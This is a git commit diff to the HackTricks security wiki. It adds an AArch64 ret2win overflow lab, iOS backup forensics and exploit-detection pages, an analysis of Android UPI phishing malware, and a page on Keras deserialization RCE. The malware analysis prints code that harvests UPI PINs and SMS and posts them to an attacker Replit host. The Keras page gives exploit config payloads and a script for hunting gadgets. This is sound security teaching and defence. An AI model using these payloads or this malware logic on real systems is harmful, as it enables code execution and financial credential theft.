Merge branch 'master' of github.com:HackTricks-wiki/hacktricks

This commit is contained in:
carlospolop 2025-08-28 13:44:18 +02:00
commit d102dcc133
30 changed files with 1886 additions and 148 deletions

View File

@ -177,6 +177,15 @@ with tarfile.open("symlink_demo.model", "w:gz") as tf:
tf.add(PAYLOAD) # rides the symlink
```
### Deep-dive: Keras .keras deserialization and gadget hunting
For a focused guide on .keras internals, Lambda-layer RCE, the arbitrary import issue in ≤ 3.8, and post-fix gadget discovery inside the allowlist, see:
{{#ref}}
../generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.md
{{#endref}}
## References
- [OffSec blog "CVE-2024-12029 InvokeAI Deserialization of Untrusted Data"](https://www.offsec.com/blog/cve-2024-12029/)
@ -184,4 +193,4 @@ with tarfile.open("symlink_demo.model", "w:gz") as tf:
- [Rapid7 Metasploit module documentation](https://www.rapid7.com/db/modules/exploit/linux/http/invokeai_rce_cve_2024_12029/)
- [PyTorch security considerations for torch.load](https://pytorch.org/docs/stable/notes/serialization.html#security)
{{#include ../banners/hacktricks-training.md}}
{{#include ../banners/hacktricks-training.md}}

View File

@ -41,6 +41,7 @@
- [Anti-Forensic Techniques](generic-methodologies-and-resources/basic-forensic-methodology/anti-forensic-techniques.md)
- [Docker Forensics](generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics.md)
- [Image Acquisition & Mount](generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md)
- [Ios Backup Forensics](generic-methodologies-and-resources/basic-forensic-methodology/ios-backup-forensics.md)
- [Linux Forensics](generic-methodologies-and-resources/basic-forensic-methodology/linux-forensics.md)
- [Malware Analysis](generic-methodologies-and-resources/basic-forensic-methodology/malware-analysis.md)
- [Memory dump analysis](generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/README.md)
@ -61,6 +62,7 @@
- [Office file analysis](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md)
- [PDF File analysis](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md)
- [PNG tricks](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md)
- [Structural File Format Exploit Detection](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/structural-file-format-exploit-detection.md)
- [Video and Audio file analysis](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md)
- [ZIPs tricks](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md)
- [Windows Artifacts](generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/README.md)
@ -69,6 +71,7 @@
- [Bypass Python sandboxes](generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md)
- [LOAD_NAME / LOAD_CONST opcode OOB Read](generic-methodologies-and-resources/python/bypass-python-sandboxes/load_name-load_const-opcode-oob-read.md)
- [Class Pollution (Python's Prototype Pollution)](generic-methodologies-and-resources/python/class-pollution-pythons-prototype-pollution.md)
- [Keras Model Deserialization Rce And Gadget Hunting](generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.md)
- [Python Internal Read Gadgets](generic-methodologies-and-resources/python/python-internal-read-gadgets.md)
- [Pyscript](generic-methodologies-and-resources/python/pyscript.md)
- [venv](generic-methodologies-and-resources/python/venv.md)

View File

@ -33,9 +33,21 @@ int main() {
Compile without pie and canary:
```bash
clang -o ret2win ret2win.c -fno-stack-protector -Wno-format-security -no-pie
clang -o ret2win ret2win.c -fno-stack-protector -Wno-format-security -no-pie -mbranch-protection=none
```
- The extra flag `-mbranch-protection=none` disables AArch64 Branch Protection (PAC/BTI). If your toolchain defaults to enabling PAC or BTI, this keeps the lab reproducible. To check whether a compiled binary uses PAC/BTI you can:
- Look for AArch64 GNU properties:
- `readelf --notes -W ret2win | grep -E 'AARCH64_FEATURE_1_(BTI|PAC)'`
- Inspect prologues/epilogues for `paciasp`/`autiasp` (PAC) or for `bti c` landing pads (BTI):
- `objdump -d ret2win | head -n 40`
### AArch64 calling convention quick facts
- The link register is `x30` (a.k.a. `lr`), and functions typically save `x29`/`x30` with `stp x29, x30, [sp, #-16]!` and restore them with `ldp x29, x30, [sp], #16; ret`.
- This means the saved return address lives at `sp+8` relative to the frame base. With a `char buffer[64]` placed below, the usual overwrite distance to the saved `x30` is 64 (buffer) + 8 (saved x29) = 72 bytes — exactly what well find below.
- The stack pointer must remain 16byte aligned at function boundaries. If you build ROP chains later for more complex scenarios, keep the SP alignment or you may crash on function epilogues.
## Finding the offset
### Pattern option
@ -112,6 +124,8 @@ from pwn import *
# Configuration
binary_name = './ret2win'
p = process(binary_name)
# Optional but nice for AArch64
context.arch = 'aarch64'
# Prepare the payload
offset = 72
@ -187,6 +201,47 @@ print(p.recvline())
p.close()
```
### Notes on modern AArch64 hardening (PAC/BTI) and ret2win
- If the binary is compiled with AArch64 Branch Protection, you may see `paciasp`/`autiasp` or `bti c` emitted in function prologues/epilogues. In that case:
- Returning to an address that is not a valid BTI landing pad may raise a `SIGILL`. Prefer targeting the exact function entry that contains `bti c`.
- If PAC is enabled for returns, naive returnaddress overwrites may fail because the epilogue authenticates `x30`. For learning scenarios, rebuild with `-mbranch-protection=none` (shown above). When attacking real targets, prefer nonreturn hijacks (e.g., function pointer overwrites) or build ROP that never executes an `autiasp`/`ret` pair that authenticates your forged LR.
- To check features quickly:
- `readelf --notes -W ./ret2win` and look for `AARCH64_FEATURE_1_BTI` / `AARCH64_FEATURE_1_PAC` notes.
- `objdump -d ./ret2win | head -n 40` and look for `bti c`, `paciasp`, `autiasp`.
### Running on nonARM64 hosts (qemuuser quick tip)
If you are on x86_64 but want to practice AArch64:
```bash
# Install qemu-user and AArch64 libs (Debian/Ubuntu)
sudo apt-get install qemu-user qemu-user-static libc6-arm64-cross
# Run the binary with the AArch64 loader environment
qemu-aarch64 -L /usr/aarch64-linux-gnu ./ret2win
# Debug with GDB (qemu-user gdbstub)
qemu-aarch64 -g 1234 -L /usr/aarch64-linux-gnu ./ret2win &
# In another terminal
gdb-multiarch ./ret2win -ex 'target remote :1234'
```
### Related HackTricks pages
-
{{#ref}}
../../rop-return-oriented-programing/rop-syscall-execv/ret2syscall-arm64.md
{{#endref}}
-
{{#ref}}
../../rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.md
{{#endref}}
## References
- Enabling PAC and BTI on AArch64 for Linux (Arm Community, Nov 2024). https://community.arm.com/arm-community-blogs/b/operating-systems-blog/posts/enabling-pac-and-bti-on-aarch64-for-linux
- Procedure Call Standard for the Arm 64-bit Architecture (AAPCS64). https://github.com/ARM-software/abi-aa/blob/main/aapcs64/aapcs64.rst
{{#include ../../../banners/hacktricks-training.md}}

View File

@ -23,6 +23,33 @@ malware-analysis.md
if you are given a **forensic image** of a device you can start **analyzing the partitions, file-system** used and **recovering** potentially **interesting files** (even deleted ones). Learn how in:
{{#ref}}
partitions-file-systems-carving/
{{#endref}}# Basic Forensic Methodology
## Creating and Mounting an Image
{{#ref}}
../../generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md
{{#endref}}
## Malware Analysis
This **isn't necessary the first step to perform once you have the image**. But you can use this malware analysis techniques independently if you have a file, a file-system image, memory image, pcap... so it's good to **keep these actions in mind**:
{{#ref}}
malware-analysis.md
{{#endref}}
## Inspecting an Image
if you are given a **forensic image** of a device you can start **analyzing the partitions, file-system** used and **recovering** potentially **interesting files** (even deleted ones). Learn how in:
{{#ref}}
partitions-file-systems-carving/
{{#endref}}
@ -44,6 +71,60 @@ linux-forensics.md
docker-forensics.md
{{#endref}}
{{#ref}}
ios-backup-forensics.md
{{#endref}}
## Deep inspection of specific file-types and Software
If you have very **suspicious** **file**, then **depending on the file-type and software** that created it several **tricks** may be useful.\
Read the following page to learn some interesting tricks:
{{#ref}}
specific-software-file-type-tricks/
{{#endref}}
I want to do a special mention to the page:
{{#ref}}
specific-software-file-type-tricks/browser-artifacts.md
{{#endref}}
## Memory Dump Inspection
{{#ref}}
memory-dump-analysis/
{{#endref}}
## Pcap Inspection
{{#ref}}
pcap-inspection/
{{#endref}}
## **Anti-Forensic Techniques**
Keep in mind the possible use of anti-forensic techniques:
{{#ref}}
anti-forensic-techniques.md
{{#endref}}
## Threat Hunting
{{#ref}}
file-integrity-monitoring.md
{{#endref}}
## Deep inspection of specific file-types and Software
If you have very **suspicious** **file**, then **depending on the file-type and software** that created it several **tricks** may be useful.\
@ -93,4 +174,3 @@ file-integrity-monitoring.md
{{#include ../../banners/hacktricks-training.md}}

View File

@ -0,0 +1,132 @@
# iOS Backup Forensics (Messagingcentric triage)
{{#include ../../banners/hacktricks-training.md}}
This page describes practical steps to reconstruct and analyze iOS backups for signs of 0click exploit delivery via messaging app attachments. It focuses on turning Apples hashed backup layout into humanreadable paths, then enumerating and scanning attachments across common apps.
Goals:
- Rebuild readable paths from Manifest.db
- Enumerate messaging databases (iMessage, WhatsApp, Signal, Telegram, Viber)
- Resolve attachment paths, extract embedded objects (PDF/Images/Fonts), and feed them to structural detectors
## Reconstructing an iOS backup
Backups stored under MobileSync use hashed filenames that are not humanreadable. The Manifest.db SQLite database maps each stored object to its logical path.
Highlevel procedure:
1) Open Manifest.db and read the file records (domain, relativePath, flags, fileID/hash)
2) Recreate the original folder hierarchy based on domain + relativePath
3) Copy or hardlink each stored object to its reconstructed path
Example workflow with a tool that implements this endtoend (ElegantBouncer):
```bash
# Rebuild the backup into a readable folder tree
$ elegant-bouncer --ios-extract /path/to/backup --output /tmp/reconstructed
[+] Reading Manifest.db ...
✓ iOS backup extraction completed successfully!
```
Notes:
- Handle encrypted backups by supplying the backup password to your extractor
- Preserve original timestamps/ACLs when possible for evidentiary value
## Messaging app attachment enumeration
After reconstruction, enumerate attachments for popular apps. The exact schema varies by app/version, but the approach is similar: query the messaging database, join messages to attachments, and resolve paths on disk.
### iMessage (sms.db)
Key tables: message, attachment, message_attachment_join (MAJ), chat, chat_message_join (CMJ)
Example queries:
```sql
-- List attachments with basic message linkage
SELECT
m.ROWID AS message_rowid,
a.ROWID AS attachment_rowid,
a.filename AS attachment_path,
m.handle_id,
m.date,
m.is_from_me
FROM message m
JOIN message_attachment_join maj ON maj.message_id = m.ROWID
JOIN attachment a ON a.ROWID = maj.attachment_id
ORDER BY m.date DESC;
-- Include chat names via chat_message_join
SELECT
c.display_name,
a.filename AS attachment_path,
m.date
FROM chat c
JOIN chat_message_join cmj ON cmj.chat_id = c.ROWID
JOIN message m ON m.ROWID = cmj.message_id
JOIN message_attachment_join maj ON maj.message_id = m.ROWID
JOIN attachment a ON a.ROWID = maj.attachment_id
ORDER BY m.date DESC;
```
Attachment paths may be absolute or relative to the reconstructed tree under Library/SMS/Attachments/.
### WhatsApp (ChatStorage.sqlite)
Common linkage: message table ↔ media/attachment table (naming varies by version). Query media rows to obtain ondisk paths.
Example (generic):
```sql
SELECT
m.Z_PK AS message_pk,
mi.ZMEDIALOCALPATH AS media_path,
m.ZMESSAGEDATE AS message_date
FROM ZWAMESSAGE m
LEFT JOIN ZWAMEDIAITEM mi ON mi.ZMESSAGE = m.Z_PK
WHERE mi.ZMEDIALOCALPATH IS NOT NULL
ORDER BY m.ZMESSAGEDATE DESC;
```
Adjust table/column names to your app version (ZWAMESSAGE/ZWAMEDIAITEM are common in iOS builds).
### Signal / Telegram / Viber
- Signal: the message DB is encrypted; however, attachments cached on disk (and thumbnails) are usually scanable
- Telegram: inspect cache directories (photo/video/document caches) and map to chats when possible
- Viber: Viber.sqlite contains message/attachment tables with ondisk references
Tip: even when metadata is encrypted, scanning the media/cache directories still surfaces malicious objects.
## Scanning attachments for structural exploits
Once you have attachment paths, feed them into structural detectors that validate fileformat invariants instead of signatures. Example with ElegantBouncer:
```bash
# Recursively scan only messaging attachments under the reconstructed tree
$ elegant-bouncer --scan --messaging /tmp/reconstructed
[+] Found N messaging app attachments to scan
✗ THREAT in WhatsApp chat 'John Doe': suspicious_document.pdf → FORCEDENTRY (JBIG2)
✗ THREAT in iMessage: photo.webp → BLASTPASS (VP8L)
```
Detections covered by structural rules include:
- PDF/JBIG2 FORCEDENTRY (CVE202130860): impossible JBIG2 dictionary states
- WebP/VP8L BLASTPASS (CVE20234863): oversized Huffman table constructions
- TrueType TRIANGULATION (CVE202341990): undocumented bytecode opcodes
- DNG/TIFF CVE202543300: metadata vs. stream component mismatches
## Validation, caveats, and false positives
- Time conversions: iMessage stores dates in Apple epochs/units on some versions; convert appropriately during reporting
- Schema drift: app SQLite schemas change over time; confirm table/column names per device build
- Recursive extraction: PDFs may embed JBIG2 streams and fonts; extract and scan inner objects
- False positives: structural heuristics are conservative but can flag rare malformed yet benign media
## References
- [ELEGANTBOUNCER: When You Can't Get the Samples but Still Need to Catch the Threat](https://www.msuiche.com/posts/elegantbouncer-when-you-cant-get-the-samples-but-still-need-to-catch-the-threat/)
- [ElegantBouncer project (GitHub)](https://github.com/msuiche/elegant-bouncer)
{{#include ../../banners/hacktricks-training.md}}

View File

@ -35,6 +35,11 @@ pdf-file-analysis.md
{{#endref}}
{{#ref}}
structural-file-format-exploit-detection.md
{{#endref}}
{{#ref}}
png-tricks.md
{{#endref}}
@ -50,5 +55,3 @@ zips-tricks.md
{{#endref}}
{{#include ../../../banners/hacktricks-training.md}}

View File

@ -0,0 +1,183 @@
# Structural FileFormat Exploit Detection (0Click Chains)
{{#include ../../../banners/hacktricks-training.md}}
This page summarizes practical techniques to detect 0click mobile exploit files by validating structural invariants of their formats instead of relying on byte signatures. The approach generalizes across samples, polymorphic variants, and future exploits that abuse the same parser logic.
Key idea: encode structural impossibilities and crossfield inconsistencies that only appear when a vulnerable decoder/parser state is reached.
See also:
{{#ref}}
pdf-file-analysis.md
{{#endref}}
## Why structure, not signatures
When weaponized samples are unavailable and payload bytes mutate, traditional IOC/YARA patterns fail. Structural detection inspects the containers declared layout versus what is mathematically or semantically possible for the format implementation.
Typical checks:
- Validate table sizes and bounds derived from the spec and safe implementations
- Flag illegal/undocumented opcodes or state transitions in embedded bytecode
- Crosscheck metadata VS actual encoded stream components
- Detect contradictory fields that indicate parser confusion or integer overflow setups
Below are concrete, fieldtested patterns for multiple highimpact chains.
---
## PDF/JBIG2 FORCEDENTRY (CVE202130860)
Target: JBIG2 symbol dictionaries embedded inside PDFs (often used in mobile MMS parsing).
Structural signals:
- Contradictory dictionary state that cannot occur in benign content but is required to trigger the overflow in arithmetic decoding.
- Suspicious use of global segments combined with abnormal symbol counts during refinement coding.
Pseudologic:
```pseudo
# Detecting impossible dictionary state used by FORCEDENTRY
if input_symbols_count == 0 and (ex_syms > 0 and ex_syms < 4):
mark_malicious("JBIG2 impossible symbol dictionary state")
```
Practical triage:
- Identify and extract JBIG2 streams from the PDF
- pdfid/pdf-parser/peepdf to locate and dump streams
- Verify arithmetic coding flags and symbol dictionary parameters against the JBIG2 spec
Notes:
- Works without embedded payload signatures
- Low FP in practice because the flagged state is mathematically inconsistent
---
## WebP/VP8L BLASTPASS (CVE20234863)
Target: WebP lossless (VP8L) Huffman prefixcode tables.
Structural signals:
- Total size of constructed Huffman tables exceeds the safe upper bound expected by the reference/patched implementations, implying the overflow precondition.
Pseudologic:
```pseudo
# Detect malformed Huffman table construction triggering overflow
let total_size = sum(table_sizes)
if total_size > 2954: # example bound: FIXED_TABLE_SIZE + MAX_TABLE_SIZE
mark_malicious("VP8L oversized Huffman tables")
```
Practical triage:
- Check WebP container chunks: VP8X + VP8L
- Parse VP8L prefix codes and compute actual allocated table sizes
Notes:
- Robust against bytelevel polymorphism of the payload
- Bound is derived from upstream limits/patch analysis
---
## TrueType TRIANGULATION (CVE202341990)
Target: TrueType bytecode inside fpgm/prep/glyf programs.
Structural signals:
- Presence of undocumented/forbidden opcodes in Apples interpreter used by the exploit chain.
Pseudologic:
```pseudo
# Flag undocumented TrueType opcodes leveraged by TRIANGULATION
switch opcode:
case 0x8F, 0x90:
mark_malicious("Undocumented TrueType bytecode")
default:
continue
```
Practical triage:
- Dump font tables (e.g., using fontTools/ttx) and scan fpgm/prep/glyf programs
- No need to fully emulate the interpreter to get value from presence checks
Notes:
- May produce rare FPs if nonstandard fonts include unknown opcodes; validate with secondary tooling
---
## DNG/TIFF CVE202543300
Target: DNG/TIFF image metadata VS actual component count in encoded stream (e.g., JPEGLossless SOF3).
Structural signals:
- Inconsistency between EXIF/IFD fields (SamplesPerPixel, PhotometricInterpretation) and the component count parsed from the image stream header used by the pipeline.
Pseudologic:
```pseudo
# Metadata claims 2 samples per pixel but stream header exposes only 1 component
if samples_per_pixel == 2 and sof3_components == 1:
mark_malicious("DNG/TIFF metadata vs. stream mismatch")
```
Practical triage:
- Parse primary IFD and EXIF tags
- Locate and parse the embedded JPEGLossless header (SOF3) and compare component counts
Notes:
- Reported exploited in the wild; excellent candidate for structural consistency checks
---
## Implementation patterns and performance
A practical scanner should:
- Autodetect file type and dispatch only relevant analyzers (PDF/JBIG2, WebP/VP8L, TTF, DNG/TIFF)
- Stream/partialparse to minimize allocations and enable early termination
- Run analyses in parallel (threadpool) for bulk triage
Example workflow with ElegantBouncer (opensource Rust implementation of these checks):
```bash
# Scan a path recursively with structural detectors
$ elegant-bouncer --scan /path/to/directory
# Optional TUI for parallel scanning and realtime alerts
$ elegant-bouncer --tui --scan /path/to/samples
```
---
## DFIR tips and edge cases
- Embedded objects: PDFs may embed images (JBIG2) and fonts (TrueType); extract and recursively scan
- Decompression safety: use libraries that hardlimit tables/buffers before allocation
- False positives: keep rules conservative, favor contradictions that are impossible under the spec
- Version drift: rebaseline bounds (e.g., VP8L table sizes) when upstream parsers change limits
---
## Related tools
- ElegantBouncer structural scanner for the detections above
- pdfid/pdf-parser/peepdf PDF object extraction and static analysis
- pdfcpu PDF linter/sanitizer
- fontTools/ttx dump TrueType tables and bytecode
- exiftool read TIFF/DNG/EXIF metadata
- dwebp/webpmux parse WebP metadata and chunks
---
## References
- [ELEGANTBOUNCER: When You Can't Get the Samples but Still Need to Catch the Threat](https://www.msuiche.com/posts/elegantbouncer-when-you-cant-get-the-samples-but-still-need-to-catch-the-threat/)
- [ElegantBouncer project (GitHub)](https://github.com/msuiche/elegant-bouncer)
- [Researching FORCEDENTRY: Detecting the exploit with no samples](https://www.msuiche.com/posts/researching-forcedentry-detecting-the-exploit-with-no-samples/)
- [Researching BLASTPASS Detecting the exploit inside a WebP file (Part 1)](https://www.msuiche.com/posts/researching-blastpass-detecting-the-exploit-inside-a-webp-file-part-1/)
- [Researching BLASTPASS Analysing the Apple & Google WebP PoC file (Part 2)](https://www.msuiche.com/posts/researching-blastpass-analysing-the-apple-google-webp-poc-file-part-2/)
- [Researching TRIANGULATION Detecting CVE202341990 with singlebyte signatures](https://www.msuiche.com/posts/researching-triangulation-detecting-cve-2023-41990-with-single-byte-signatures/)
- [CVE202543300: Critical vulnerability found in Apples DNG image processing](https://www.msuiche.com/posts/cve-2025-43300-critical-vulnerability-found-in-apples-dng-image-processing/)
{{#include ../../../banners/hacktricks-training.md}}

View File

@ -90,9 +90,143 @@ Java.perform(function() {
LubanCompress 1.1.8 # "Luban" string inside classes.dex
```
---
## Android WebView Payment Phishing (UPI) Dropper + FCM C2 Pattern
This pattern has been observed in campaigns abusing government-benefit themes to steal Indian UPI credentials and OTPs. Operators chain reputable platforms for delivery and resilience.
### Delivery chain across trusted platforms
- YouTube video lure → description contains a short link
- Shortlink → GitHub Pages phishing site imitating the legit portal
- Same GitHub repo hosts an APK with a fake “Google Play” badge linking directly to the file
- Dynamic phishing pages live on Replit; remote command channel uses Firebase Cloud Messaging (FCM)
### Dropper with embedded payload and offline install
- First APK is an installer (dropper) that ships the real malware at `assets/app.apk` and prompts the user to disable WiFi/mobile data to blunt cloud detection.
- The embedded payload installs under an innocuous label (e.g., “Secure Update”). After install, both the installer and the payload are present as separate apps.
Static triage tip (grep for embedded payloads):
```bash
unzip -l sample.apk | grep -i "assets/app.apk"
# Or:
zipgrep -i "classes|.apk" sample.apk | head
```
### Dynamic endpoint discovery via shortlink
- Malware fetches a plain-text, comma-separated list of live endpoints from a shortlink; simple string transforms produce the final phishing page path.
Example (sanitised):
```
GET https://rebrand.ly/dclinkto2
Response: https://sqcepo.replit.app/gate.html,https://sqcepo.replit.app/addsm.php
Transform: "gate.html" → "gate.htm" (loaded in WebView)
UPI credential POST: https://sqcepo.replit.app/addup.php
SMS upload: https://sqcepo.replit.app/addsm.php
```
Pseudo-code:
```java
String csv = httpGet(shortlink);
String[] parts = csv.split(",");
String upiPage = parts[0].replace("gate.html", "gate.htm");
String smsPost = parts[1];
String credsPost = upiPage.replace("gate.htm", "addup.php");
```
### WebView-based UPI credential harvesting
- The “Make payment of ₹1 / UPILite” step loads an attacker HTML form from the dynamic endpoint inside a WebView and captures sensitive fields (phone, bank, UPI PIN) which are `POST`ed to `addup.php`.
Minimal loader:
```java
WebView wv = findViewById(R.id.web);
wv.getSettings().setJavaScriptEnabled(true);
wv.loadUrl(upiPage); // ex: https://<replit-app>/gate.htm
```
### Self-propagation and SMS/OTP interception
- Aggressive permissions are requested on first run:
```xml
<uses-permission android:name="android.permission.READ_CONTACTS"/>
<uses-permission android:name="android.permission.SEND_SMS"/>
<uses-permission android:name="android.permission.READ_SMS"/>
<uses-permission android:name="android.permission.CALL_PHONE"/>
```
- Contacts are looped to mass-send smishing SMS from the victims device.
- Incoming SMS are intercepted by a broadcast receiver and uploaded with metadata (sender, body, SIM slot, per-device random ID) to `/addsm.php`.
Receiver sketch:
```java
public void onReceive(Context c, Intent i){
SmsMessage[] msgs = Telephony.Sms.Intents.getMessagesFromIntent(i);
for (SmsMessage m: msgs){
postForm(urlAddSms, new FormBody.Builder()
.add("senderNum", m.getOriginatingAddress())
.add("Message", m.getMessageBody())
.add("Slot", String.valueOf(getSimSlot(i)))
.add("Device rand", getOrMakeDeviceRand(c))
.build());
}
}
```
### Firebase Cloud Messaging (FCM) as resilient C2
- The payload registers to FCM; push messages carry a `_type` field used as a switch to trigger actions (e.g., update phishing text templates, toggle behaviours).
Example FCM payload:
```json
{
"to": "<device_fcm_token>",
"data": {
"_type": "update_texts",
"template": "New subsidy message..."
}
}
```
Handler sketch:
```java
@Override
public void onMessageReceived(RemoteMessage msg){
String t = msg.getData().get("_type");
switch (t){
case "update_texts": applyTemplate(msg.getData().get("template")); break;
case "smish": sendSmishToContacts(); break;
// ... more remote actions
}
}
```
### Hunting patterns and IOCs
- APK contains secondary payload at `assets/app.apk`
- WebView loads payment from `gate.htm` and exfiltrates to `/addup.php`
- SMS exfiltration to `/addsm.php`
- Shortlink-driven config fetch (e.g., `rebrand.ly/*`) returning CSV endpoints
- Apps labelled as generic “Update/Secure Update”
- FCM `data` messages with a `_type` discriminator in untrusted apps
### Detection & defence ideas
- Flag apps that instruct users to disable network during install and then side-load a second APK from `assets/`.
- Alert on the permission tuple: `READ_CONTACTS` + `READ_SMS` + `SEND_SMS` + WebView-based payment flows.
- Egress monitoring for `POST /addup.php|/addsm.php` on non-corporate hosts; block known infrastructure.
- Mobile EDR rules: untrusted app registering for FCM and branching on a `_type` field.
---
## References
- [The Dark Side of Romance: SarangTrap Extortion Campaign](https://zimperium.com/blog/the-dark-side-of-romance-sarangtrap-extortion-campaign)
- [Luban Android image compression library](https://github.com/Curzibn/Luban)
- [Android Malware Promises Energy Subsidy to Steal Financial Data (McAfee Labs)](https://www.mcafee.com/blogs/other-blogs/mcafee-labs/android-malware-promises-energy-subsidy-to-steal-financial-data/)
- [Firebase Cloud Messaging — Docs](https://firebase.google.com/docs/cloud-messaging)
{{#include ../../banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

View File

@ -7,6 +7,7 @@
- [**Pyscript hacking tricks**](pyscript.md)
- [**Python deserializations**](../../pentesting-web/deserialization/README.md)
- [**Keras model deserialization RCE and gadget hunting**](keras-model-deserialization-rce-and-gadget-hunting.md)
- [**Tricks to bypass python sandboxes**](bypass-python-sandboxes/README.md)
- [**Basic python web requests syntax**](web-requests.md)
- [**Basic python syntax and libraries**](basic-python.md)

View File

@ -0,0 +1,219 @@
# Keras Model Deserialization RCE and Gadget Hunting
{{#include ../../banners/hacktricks-training.md}}
This page summarizes practical exploitation techniques against the Keras model deserialization pipeline, explains the native .keras format internals and attack surface, and provides a researcher toolkit for finding Model File Vulnerabilities (MFVs) and post-fix gadgets.
## .keras model format internals
A .keras file is a ZIP archive containing at least:
- metadata.json generic info (e.g., Keras version)
- config.json model architecture (primary attack surface)
- model.weights.h5 weights in HDF5
The config.json drives recursive deserialization: Keras imports modules, resolves classes/functions and reconstructs layers/objects from attacker-controlled dictionaries.
Example snippet for a Dense layer object:
```json
{
"module": "keras.layers",
"class_name": "Dense",
"config": {
"units": 64,
"activation": {
"module": "keras.activations",
"class_name": "relu"
},
"kernel_initializer": {
"module": "keras.initializers",
"class_name": "GlorotUniform"
}
}
}
```
Deserialization performs:
- Module import and symbol resolution from module/class_name keys
- from_config(...) or constructor invocation with attacker-controlled kwargs
- Recursion into nested objects (activations, initializers, constraints, etc.)
Historically, this exposed three primitives to an attacker crafting config.json:
- Control of what modules are imported
- Control of which classes/functions are resolved
- Control of kwargs passed into constructors/from_config
## CVE-2024-3660 Lambda-layer bytecode RCE
Root cause:
- Lambda.from_config() used python_utils.func_load(...) which base64-decodes and calls marshal.loads() on attacker bytes; Python unmarshalling can execute code.
Exploit idea (simplified payload in config.json):
```json
{
"module": "keras.layers",
"class_name": "Lambda",
"config": {
"name": "exploit_lambda",
"function": {
"function_type": "lambda",
"bytecode_b64": "<attacker_base64_marshal_payload>"
}
}
}
```
Mitigation:
- Keras enforces safe_mode=True by default. Serialized Python functions in Lambda are blocked unless a user explicitly opts out with safe_mode=False.
Notes:
- Legacy formats (older HDF5 saves) or older codebases may not enforce modern checks, so “downgrade” style attacks can still apply when victims use older loaders.
## CVE-2025-1550 Arbitrary module import in Keras ≤ 3.8
Root cause:
- _retrieve_class_or_fn used unrestricted importlib.import_module() with attacker-controlled module strings from config.json.
- Impact: Arbitrary import of any installed module (or attacker-planted module on sys.path). Import-time code runs, then object construction occurs with attacker kwargs.
Exploit idea:
```json
{
"module": "maliciouspkg",
"class_name": "Danger",
"config": {"arg": "val"}
}
```
Security improvements (Keras ≥ 3.9):
- Module allowlist: imports restricted to official ecosystem modules: keras, keras_hub, keras_cv, keras_nlp
- Safe mode default: safe_mode=True blocks unsafe Lambda serialized-function loading
- Basic type checking: deserialized objects must match expected types
## Post-fix gadget surface inside allowlist
Even with allowlisting and safe mode, a broad surface remains among allowed Keras callables. For example, keras.utils.get_file can download arbitrary URLs to user-selectable locations.
Gadget via Lambda that references an allowed function (not serialized Python bytecode):
```json
{
"module": "keras.layers",
"class_name": "Lambda",
"config": {
"name": "dl",
"function": {"module": "keras.utils", "class_name": "get_file"},
"arguments": {
"fname": "artifact.bin",
"origin": "https://example.com/artifact.bin",
"cache_dir": "/tmp/keras-cache"
}
}
}
```
Important limitation:
- Lambda.call() prepends the input tensor as the first positional argument when invoking the target callable. Chosen gadgets must tolerate an extra positional arg (or accept *args/**kwargs). This constrains which functions are viable.
Potential impacts of allowlisted gadgets:
- Arbitrary download/write (path planting, config poisoning)
- Network callbacks/SSRF-like effects depending on environment
- Chaining to code execution if written paths are later imported/executed or added to PYTHONPATH, or if a writable execution-on-write location exists
## Researcher toolkit
1) Systematic gadget discovery in allowed modules
Enumerate candidate callables across keras, keras_nlp, keras_cv, keras_hub and prioritize those with file/network/process/env side effects.
```python
import importlib, inspect, pkgutil
ALLOWLIST = ["keras", "keras_nlp", "keras_cv", "keras_hub"]
seen = set()
def iter_modules(mod):
if not hasattr(mod, "__path__"):
return
for m in pkgutil.walk_packages(mod.__path__, mod.__name__ + "."):
yield m.name
candidates = []
for root in ALLOWLIST:
try:
r = importlib.import_module(root)
except Exception:
continue
for name in iter_modules(r):
if name in seen:
continue
seen.add(name)
try:
m = importlib.import_module(name)
except Exception:
continue
for n, obj in inspect.getmembers(m):
if inspect.isfunction(obj) or inspect.isclass(obj):
sig = None
try:
sig = str(inspect.signature(obj))
except Exception:
pass
doc = (inspect.getdoc(obj) or "").lower()
text = f"{name}.{n} {sig} :: {doc}"
# Heuristics: look for I/O or network-ish hints
if any(x in doc for x in ["download", "file", "path", "open", "url", "http", "socket", "env", "process", "spawn", "exec"]):
candidates.append(text)
print("\n".join(sorted(candidates)[:200]))
```
2) Direct deserialization testing (no .keras archive needed)
Feed crafted dicts directly into Keras deserializers to learn accepted params and observe side effects.
```python
from keras import layers
cfg = {
"module": "keras.layers",
"class_name": "Lambda",
"config": {
"name": "probe",
"function": {"module": "keras.utils", "class_name": "get_file"},
"arguments": {"fname": "x", "origin": "https://example.com/x"}
}
}
layer = layers.deserialize(cfg, safe_mode=True) # Observe behavior
```
3) Cross-version probing and formats
Keras exists in multiple codebases/eras with different guardrails and formats:
- TensorFlow built-in Keras: tensorflow/python/keras (legacy, slated for deletion)
- tf-keras: maintained separately
- Multi-backend Keras 3 (official): introduced native .keras
Repeat tests across codebases and formats (.keras vs legacy HDF5) to uncover regressions or missing guards.
## Defensive recommendations
- Treat model files as untrusted input. Only load models from trusted sources.
- Keep Keras up to date; use Keras ≥ 3.9 to benefit from allowlisting and type checks.
- Do not set safe_mode=False when loading models unless you fully trust the file.
- Consider running deserialization in a sandboxed, least-privileged environment without network egress and with restricted filesystem access.
- Enforce allowlists/signatures for model sources and integrity checking where possible.
## References
- [Hunting Vulnerabilities in Keras Model Deserialization (huntr blog)](https://blog.huntr.com/hunting-vulnerabilities-in-keras-model-deserialization)
- [Keras PR #20751 Added checks to serialization](https://github.com/keras-team/keras/pull/20751)
